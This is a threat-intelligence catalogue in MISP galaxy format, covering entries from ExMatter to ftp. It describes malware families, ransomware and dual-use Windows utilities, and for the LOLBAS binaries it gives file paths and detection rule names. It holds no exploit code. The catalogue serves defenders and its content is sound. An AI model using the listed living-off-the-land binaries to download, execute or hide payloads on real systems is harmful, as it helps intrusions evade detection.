tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ExMatter
ExMatter is a custom data exfiltration tool. It was first observed in November 2021 during intrusions involving BlackMatter ransomware, and more recently has been used during BlackCat ransomware attacks. In August 2022, researchers observed a “heavily updated” version of ExMatter, which featured expanded protocols for exfiltrating data, a data corruption capability, enhanced defense evasion abilities, and a narrower range of targeted file types.[Symantec Noberus September 22 2022]
Internal MISP references
UUID 068b26ae-39b5-4b4e-8faa-eb304a17687d
which can be used as unique global reference for ExMatter
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5054 |
source | Tidal Cyber |
tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Expand
Expand is a Windows utility used to expand one or more compressed CAB files.[Microsoft Expand Utility] It has been used by BBSRAT to decompress a CAB file into executable content.[Palo Alto Networks BBSRAT]
Internal MISP references
UUID 5d7a39e3-c667-45b3-987e-3b0ca49cff61
which can be used as unique global reference for Expand
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0361 |
source | MITRE |
tags | ['182dd4be-bbda-404f-aad1-156a22bbe7a4', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Explorer
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary used for managing files and system components within Windows
Author: Jai Minton
Paths: * C:\Windows\explorer.exe * C:\Windows\SysWOW64\explorer.exe
Resources: * https://twitter.com/CyberRaiju/status/1273597319322058752?s=20 * https://twitter.com/bohops/status/1276356245541335048 * https://twitter.com/bohops/status/986984122563391488
Detection: * Sigma: proc_creation_win_explorer_break_process_tree.yml * Sigma: proc_creation_win_explorer_lolbin_execution.yml * Elastic: initial_access_via_explorer_suspicious_child_parent_args.toml * IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line is suspicious.[Explorer.exe - LOLBAS Project]
Internal MISP references
UUID b792d713-fbb4-46e6-94ae-8b9a1f4e794d
which can be used as unique global reference for Explorer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5106 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Explosive
Explosive is a custom-made remote access tool used by the group Volatile Cedar. It was first identified in the wild in 2015.[CheckPoint Volatile Cedar March 2015][ClearSky Lebanese Cedar Jan 2021]
Internal MISP references
UUID 572eec55-2855-49ac-a82e-2c21e9aca27e
which can be used as unique global reference for Explosive
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0569 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Extexport
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Load a DLL located in the c:\test folder with a specific name.
Author: Oddvar Moe
Paths: * C:\Program Files\Internet Explorer\Extexport.exe * C:\Program Files (x86)\Internet Explorer\Extexport.exe
Resources: * http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/
Detection: * Sigma: proc_creation_win_lolbin_extexport.yml * IOC: Extexport.exe loads dll and is execute from other folder the original path[Extexport.exe - LOLBAS Project]
Internal MISP references
UUID 2e6f1aed-a983-44fb-aed1-b4a3d9cb9488
which can be used as unique global reference for Extexport
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5107 |
source | Tidal Cyber |
tags | ['5b81675a-742a-4ffd-b410-44ce3f1b0831', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ExtPassword
ExtPassword is a tool used to recover passwords from Windows systems.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 363c38fc-8676-4a63-b3f4-f0237565a951
which can be used as unique global reference for ExtPassword
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5030 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Extrac32
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Extract to ADS, copy or overwrite a file with Extrac32.exe
Author: Oddvar Moe
Paths: * C:\Windows\System32\extrac32.exe * C:\Windows\SysWOW64\extrac32.exe
Resources: * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f * https://twitter.com/egre55/status/985994639202283520
Detection: * Elastic: defense_evasion_misc_lolbin_connecting_to_the_internet.toml * Sigma: proc_creation_win_lolbin_extrac32.yml * Sigma: proc_creation_win_lolbin_extrac32_ads.yml[Extrac32.exe - LOLBAS Project]
Internal MISP references
UUID 53dc0180-0309-4489-af75-9c76b2887359
which can be used as unique global reference for Extrac32
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5108 |
source | Tidal Cyber |
tags | ['92092803-19a9-4288-b7fb-08e92e8ea693', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
FakeM
FakeM is a shellcode-based Windows backdoor that has been used by Scarlet Mimic. [Scarlet Mimic Jan 2016]
Internal MISP references
UUID 8c64a330-1457-4c32-ab2f-12b6eb37d607
which can be used as unique global reference for FakeM
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0076 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
FakePenny
FakePenny is a ransomware, which includes both a loader and an encryptor, that is believed to have been developed by the North Korean threat actor Moonstone Sleet.[Microsoft Security Blog 5 28 2024]
Internal MISP references
UUID acbff463-ba1c-4d26-ab99-b9aa47b81c68
which can be used as unique global reference for FakePenny
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5321 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
FALLCHILL
FALLCHILL is a RAT that has been used by Lazarus Group since at least 2016 to target the aerospace, telecommunications, and finance industries. It is usually dropped by other Lazarus Group malware or delivered when a victim unknowingly visits a compromised website. [US-CERT FALLCHILL Nov 2017]
Internal MISP references
UUID ea47f1fd-0171-4254-8c92-92b7a5eec5e1
which can be used as unique global reference for FALLCHILL
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0181 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
FatDuke
FatDuke is a backdoor used by APT29 since at least 2016.[ESET Dukes October 2019]
Internal MISP references
UUID 997ff740-1b00-40b6-887a-ef4101e93295
which can be used as unique global reference for FatDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0512 |
source | MITRE |
tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Felismus
Felismus is a modular backdoor that has been used by Sowbug. [Symantec Sowbug Nov 2017] [Forcepoint Felismus Mar 2017]
Internal MISP references
UUID c66ed8ab-4692-4948-820e-5ce87cc78db5
which can be used as unique global reference for Felismus
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0171 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
FELIXROOT
FELIXROOT is a backdoor that has been used to target Ukrainian victims. [FireEye FELIXROOT July 2018]
Internal MISP references
UUID 4b1a07cd-4c1f-4d93-a454-07fd59b3039a
which can be used as unique global reference for FELIXROOT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0267 |
source | MITRE |
type | ['malware'] |
Ferocious
Ferocious is a first stage implant composed of VBS and PowerShell scripts that has been used by WIRTE since at least 2021.[Kaspersky WIRTE November 2021]
Internal MISP references
UUID 3e54ba7a-fd4c-477f-9c2d-34b4f69fc091
which can be used as unique global reference for Ferocious
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0679 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Fgdump
Fgdump is a Windows password hash dumper. [Mandiant APT1]
Internal MISP references
UUID 1bbf04bb-d869-48c5-a538-70a25503de1d
which can be used as unique global reference for Fgdump
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0120 |
source | MITRE |
type | ['tool'] |
FileZilla
FileZilla is a tool used to perform cross-platform File Transfer Protocol (FTP) to a site, server, or host.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID f2a6f899-15a8-4d77-bebd-14bc03958764
which can be used as unique global reference for FileZilla
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5031 |
source | Tidal Cyber |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '8bf128ad-288b-41bc-904f-093f4fdde745', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Final1stspy
Final1stspy is a dropper family that has been used to deliver DOGCALL.[Unit 42 Nokki Oct 2018]
Internal MISP references
UUID eb4dc358-e353-47fc-8207-b7cb10d580f7
which can be used as unique global reference for Final1stspy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0355 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Findstr
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Write to ADS, discover, or download files with Findstr.exe
Author: Oddvar Moe
Paths: * C:\Windows\System32\findstr.exe * C:\Windows\SysWOW64\findstr.exe
Resources: * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Detection: * Sigma: proc_creation_win_lolbin_findstr.yml[Findstr.exe - LOLBAS Project]
Internal MISP references
UUID a62634f8-8f42-4874-9669-bea2e053dfea
which can be used as unique global reference for Findstr
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5109 |
source | Tidal Cyber |
tags | ['6ca537bb-94b6-4b12-8978-6250baa6a5cb', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
FinFisher
FinFisher is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. It has other variants including Wingbird. [FinFisher Citation] [Microsoft SIR Vol 21] [FireEye FinSpy Sept 2017] [Securelist BlackOasis Oct 2017] [Microsoft FinFisher March 2018]
Internal MISP references
UUID 41f54ce1-842c-428a-977f-518a5b63b4d7
which can be used as unique global reference for FinFisher
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Android', 'Windows'] |
software_attack_id | S0182 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Finger
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
Author: Ruben Revuelta
Paths: * c:\windows\system32\finger.exe * c:\windows\syswow64\finger.exe
Resources: * https://twitter.com/DissectMalware/status/997340270273409024 * https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
Detection: * Sigma: proc_creation_win_finger_usage.yml * IOC: finger.exe should not be run on a normal workstation. * IOC: finger.exe connecting to external resources.[Finger.exe - LOLBAS Project]
Internal MISP references
UUID a9ce311d-dd8c-497d-b38f-b535d7318ed4
which can be used as unique global reference for Finger
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5110 |
source | Tidal Cyber |
tags | ['1da4f610-4c54-46a3-b9b3-c38a002b623e', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
FIVEHANDS
FIVEHANDS is a customized version of DEATHRANSOM ransomware written in C++. FIVEHANDS has been used since at least 2021, including in Ransomware-as-a-Service (RaaS) campaigns, sometimes along with SombRAT.[FireEye FiveHands April 2021][NCC Group Fivehands June 2021]
Internal MISP references
UUID 84187393-2fe9-4136-8720-a6893734ee8c
which can be used as unique global reference for FIVEHANDS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0618 |
source | MITRE |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'f1ad9eba-f4fd-4aec-92c0-833ac14d741b', '5e7433ad-a894-4489-93bc-41e90da90019', '15787198-6c8b-4f79-bf50-258d55072fee', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Flagpro
Flagpro is a Windows-based, first-stage downloader that has been used by BlackTech since at least October 2020. It has primarily been used against defense, media, and communications companies in Japan.[NTT Security Flagpro new December 2021]
Internal MISP references
UUID 977aaf8a-2216-40f0-8682-61dd91638147
which can be used as unique global reference for Flagpro
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0696 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Flame
Flame is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. [Kaspersky Flame]
Internal MISP references
UUID 87604333-638f-4f4a-94e0-16aa825dd5b8
which can be used as unique global reference for Flame
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0143 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647'] |
type | ['malware'] |
FLASHFLOOD
FLASHFLOOD is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps. [FireEye APT30]
Internal MISP references
UUID 44a5e62a-6de4-49d2-8f1b-e68ecdf9f332
which can be used as unique global reference for FLASHFLOOD
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0036 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
FlawedAmmyy
FlawedAmmyy is a remote access tool (RAT) that was first seen in early 2016. The code for FlawedAmmyy was based on leaked source code for a version of Ammyy Admin, a remote access software.[Proofpoint TA505 Mar 2018]
Internal MISP references
UUID 308dbe77-3d58-40bb-b0a5-cd00f152dc60
which can be used as unique global reference for FlawedAmmyy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0381 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
FlawedGrace
FlawedGrace is a fully featured remote access tool (RAT) written in C++ that was first observed in late 2017.[Proofpoint TA505 Jan 2019]
Internal MISP references
UUID c558e948-c817-4494-a95d-ad3207f10e26
which can be used as unique global reference for FlawedGrace
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0383 |
source | MITRE |
tags | ['1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '84615fe0-c2a5-4e07-8957-78ebc29b4635', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
FleetDeck
FleetDeck is a commercial remote monitoring and management (RMM) tool that enables remote desktop access and “virtual terminal” capabilities. Government and commercial reports indicate that financially motivated adversaries, including BlackCat (AKA ALPHV or Noberus) actors and Scattered Spider (AKA 0ktapus or UNC3944), have used FleetDeck for command and control and persistence purposes during intrusions.[Cyber Centre ALPHV/BlackCat July 25 2023][CrowdStrike Scattered Spider SIM Swapping December 22 2022]
Internal MISP references
UUID 68758d3a-ec4b-4c19-933d-b4c3000281b2
which can be used as unique global reference for FleetDeck
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5056 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
FLIPSIDE
FLIPSIDE is a simple tool similar to Plink that is used by FIN5 to maintain access to victims. [Mandiant FIN5 GrrCON Oct 2016]
Internal MISP references
UUID 18002747-ddcc-42c1-b0ca-1e598a9f1919
which can be used as unique global reference for FLIPSIDE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0173 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
fltMC
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Filter Manager Control Program used by Windows
Author: John Lambert
Paths: * C:\Windows\System32\fltMC.exe
Resources: * https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon
Detection: * Sigma: proc_creation_win_fltmc_unload_driver_sysmon.yml * Elastic: defense_evasion_via_filter_manager.toml * Splunk: unload_sysmon_filter_driver.yml * IOC: 4688 events with fltMC.exe[fltMC.exe - LOLBAS Project]
Internal MISP references
UUID 43d57826-cd15-4154-8f04-38351c96986e
which can be used as unique global reference for fltMC
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5111 |
source | Tidal Cyber |
tags | ['49bbb074-2406-4f27-ad77-d2e433ba1ccb', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
FoggyWeb
FoggyWeb is a passive and highly-targeted backdoor capable of remotely exfiltrating sensitive information from a compromised Active Directory Federated Services (AD FS) server. It has been used by APT29 since at least early April 2021.[MSTIC FoggyWeb September 2021]
Internal MISP references
UUID bc11844e-0348-4eed-a48a-0554d68db38c
which can be used as unique global reference for FoggyWeb
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0661 |
source | MITRE |
tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Forfiles
Forfiles is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. [Microsoft Forfiles Aug 2016]
Internal MISP references
UUID c6dc67a6-587d-4700-a7de-bee043a0031a
which can be used as unique global reference for Forfiles
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0193 |
source | MITRE |
tags | ['91804406-e20a-4455-8dbc-5528c35f8e20', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Formbook
Formbook is an information-stealing malware, discovered in 2016, that is capable of stealing data entered into HTML website forms and logging keystrokes and also acting as a downloader for other malware.[What Is FormBook Malware?][What is FormBook Malware? - Check Point Software] xLoader is a JavaScript-based, cross-platform Formbook variant discovered in 2020 that is crafted to infect macOS as well as Windows systems. Check Point Research's 2022 Mid-Year Report released in August 2022 placed Formbook as the "most prevalent" infostealer malware globally (and second-most prevalent of all malware types globally, behind only Emotet).[Check Point Mid-Year Report 2022]
Internal MISP references
UUID 376d1383-17a7-48b0-8a8b-d6142b2f3003
which can be used as unique global reference for Formbook
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5288 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
FRAMESTING
FRAMESTING is a Python web shell that was used during Cutting Edge to embed into an Ivanti Connect Secure Python package for command execution.[Mandiant Cutting Edge Part 2 January 2024]
Internal MISP references
UUID 83721b89-df58-50bf-be2a-0b696fb0da78
which can be used as unique global reference for FRAMESTING
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1120 |
source | MITRE |
type | ['malware'] |
FrameworkPOS
FrameworkPOS is a point of sale (POS) malware used by FIN6 to steal payment card data from sytems that run physical POS devices.[SentinelOne FrameworkPOS September 2019]
Internal MISP references
UUID aef7cbbc-5163-419c-8e4b-3f73bed50474
which can be used as unique global reference for FrameworkPOS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0503 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
FreeFileSync
FreeFileSync is a tool used to facilitate cloud-based file synchronization.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 1d5c5822-3cb4-455a-9976-f6bc17e2820d
which can be used as unique global reference for FreeFileSync
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5032 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '8bf128ad-288b-41bc-904f-093f4fdde745', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
FruitFly
FruitFly is designed to spy on mac users [objsee mac malware 2017].
Internal MISP references
UUID 3a05085e-5a1f-4a74-b489-d679b80e2c18
which can be used as unique global reference for FruitFly
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0277 |
source | MITRE |
type | ['malware'] |
Fsi
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.
Author: Jimmy (@bohops)
Paths: * C:\Program Files\dotnet\sdk[sdk version]\FSharp\fsi.exe * C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe
Resources: * https://twitter.com/NickTyrer/status/904273264385589248 * https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Detection: * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Fsi.exe execution may be suspicious on non-developer machines * Sigma: proc_creation_win_lolbin_fsharp_interpreters.yml[Fsi.exe - LOLBAS Project]
Internal MISP references
UUID f2a5e6cb-75fd-4108-9466-80471c7d0422
which can be used as unique global reference for Fsi
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5222 |
source | Tidal Cyber |
tags | ['7a4b56fa-5419-411b-86fe-68c9b0ddd3c5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
FsiAnyCpu
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio.
Author: Jimmy (@bohops)
Paths: * c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
Resources: * https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Detection: * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines * Sigma: proc_creation_win_lolbin_fsharp_interpreters.yml[FsiAnyCpu.exe - LOLBAS Project]
Internal MISP references
UUID 9e5c41bb-f4cc-4132-8c7a-4a10a006190b
which can be used as unique global reference for FsiAnyCpu
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5223 |
source | Tidal Cyber |
tags | ['c5d1a687-8a36-4995-b8cb-415f33661821', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Fsutil
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: File System Utility
Author: Elliot Killick
Paths: * C:\Windows\System32\fsutil.exe * C:\Windows\SysWOW64\fsutil.exe
Resources: * https://twitter.com/0gtweet/status/1720724516324704404
Detection: * IOC: fsutil.exe should not be run on a normal workstation * IOC: file setZeroData (not case-sensitive) in the process arguments * IOC: Sysmon Event ID 1 * IOC: Execution of process fsutil.exe with trace decode could be suspicious * IOC: Non-Windows netsh.exe execution * Sigma: proc_creation_win_susp_fsutil_usage.yml[Fsutil.exe - LOLBAS Project]
Internal MISP references
UUID 7a829dae-00cf-4321-95b4-276f7dfb5368
which can be used as unique global reference for Fsutil
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5112 |
source | Tidal Cyber |
tags | ['76bb7541-94da-4d66-9a57-77f788330287', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ftp
ftp is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data.[Microsoft FTP][Linux FTP]
Internal MISP references
